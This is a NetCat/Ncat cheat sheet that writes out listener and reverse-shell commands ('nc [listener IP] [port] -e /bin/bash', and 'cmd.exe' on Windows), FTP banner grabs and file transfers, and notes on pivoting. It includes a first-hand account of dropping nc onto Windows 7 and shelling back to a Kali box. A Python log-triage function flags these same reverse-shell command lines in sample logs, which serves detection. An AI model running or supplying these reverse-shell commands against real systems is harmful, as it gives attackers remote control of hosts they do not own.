NetCat (nc)
NetCat is a popular remote access tool.
- It has a small footprint so it's portable.
- It can set up a reverse shell easily…
Local listener for reverse shell:
nc -nvlp [port number]
  # -n  numeric-only IP addresses, no DNS
  # -v  verbose (twice for more verbose)
  # -l  listen mode, for inbound connects
  # -p  port number
Connect to that listener:
# For Linux (either one):
nc [listener IP] [port] -e /bin/bash
nc [listener IP] [port] -e /bin/sh
# For Windows:
nc.exe [listener IP] [port] -e cmd.exe
Connect to FTP port (21) to check version of FTP server:
nc [target IP] 21
Send output from a listener to a text file:
nc -nvlp [port number] > filename.txt
Send output from a text file to a remote machine:
nc [IP Address] [port] < filename.txt
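From the detection side, the command lines above are what shows up in process-creation logs. As an added example (not from the original page), this Python triage function classifies nc/ncat invocations into the patterns covered here: a plain listener (-l), a client handed a program via -e (the reverse-shell form shown above), or an ordinary client such as the FTP banner grab or a file transfer. The log format, hostnames and PIDs are constructed.

```python
import shlex

# Constructed sample process-creation log lines: "host pid command-line"
SAMPLE_LOGS = [
    "web01 4412 nc -nvlp 4444",
    "web01 4420 nc 10.0.0.5 4444 -e /bin/bash",
    "db02 1231 nc 10.0.0.5 443 -e /bin/sh",
    "win10-lab 3311 nc.exe 10.0.0.5 4444 -e cmd.exe",
    "web01 4470 nc 10.0.0.9 21",
    "web01 4480 nc -nvlp 9000",
    "build01 812 nc -zv 10.0.0.9 22",
]

NC_BINARIES = {"nc", "nc.exe", "netcat", "netcat.exe", "ncat", "ncat.exe"}
# -e attaches a program to the connection in classic nc and Ncat; Ncat also has
# --exec/--sh-exec. "-c" is deliberately not treated as exec: in the Windows
# netcat 1.12 build described below it only switches to CRLF line endings.
EXEC_FLAGS = {"-e", "--exec", "--sh-exec"}


def _is_listen(arg: str) -> bool:
    # Short options may be clustered (-nvlp, -lvp): any cluster containing 'l' listens
    return arg == "--listen" or (arg.startswith("-") and not arg.startswith("--") and "l" in arg[1:])


def _is_exec(arg: str) -> bool:
    return arg in EXEC_FLAGS or arg.startswith("--exec=") or arg.startswith("--sh-exec=")


def classify_nc(cmdline: str) -> str:
    """Return 'shell_exec', 'listener', 'client', or 'not_nc' for one command line."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return "not_nc"
    if not argv or argv[0].rsplit("/", 1)[-1].lower() not in NC_BINARIES:
        return "not_nc"
    args = argv[1:]
    if any(_is_exec(a) for a in args):
        return "shell_exec"        # a program wired to the socket: the -e pattern above
    if any(_is_listen(a) for a in args):
        return "listener"          # e.g. nc -nvlp [port], possibly redirected to a file
    return "client"                # banner grab, file push, port probe: needs context


def triage(lines):
    """Return (host, pid, verdict) for every nc-family invocation in the log lines."""
    findings = []
    for line in lines:
        host, pid, cmdline = line.split(" ", 2)
        verdict = classify_nc(cmdline)
        if verdict != "not_nc":
            findings.append((host, int(pid), verdict))
    return findings
```

The 'client' verdict is intentionally loose: a banner grab and a file push look identical on the command line, so they need network context before alerting.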
NetCat Download
Simple & Easy
Initial: netcat 1.11 compiled for both 32 and 64-bit Windows.
Update: netcat 1.12 adds a -c command-line option to send CRLF line endings instead of just CR (e.g. to talk to Exchange SMTP).
I used 1.12 on Windows 7 and it was drop-and-use.
- Dropped the zip into Winders, unzipped, reverse shell back to my Kali box.
- No tweaking necessary.
Source: eternallybored.org (much thanks)
Ncat
Ncat is a much-improved reimplementation of Netcat.
- It has a variety of different capabilities:
  - SSL
  - Proxies
  - SendMail
  - Chain together Ncat sessions for pivoting.
If you need a statically compiled version of ncat.exe that you can just drop on a Windows system and use without having to run any installer or copy over extra library files: Ncat 5.59BETA1.
To ensure the file hasn't been tampered with, you can check the cryptographic signatures.
If you need a portable version of a newer Ncat release, see the Ncat portable compilation instructions.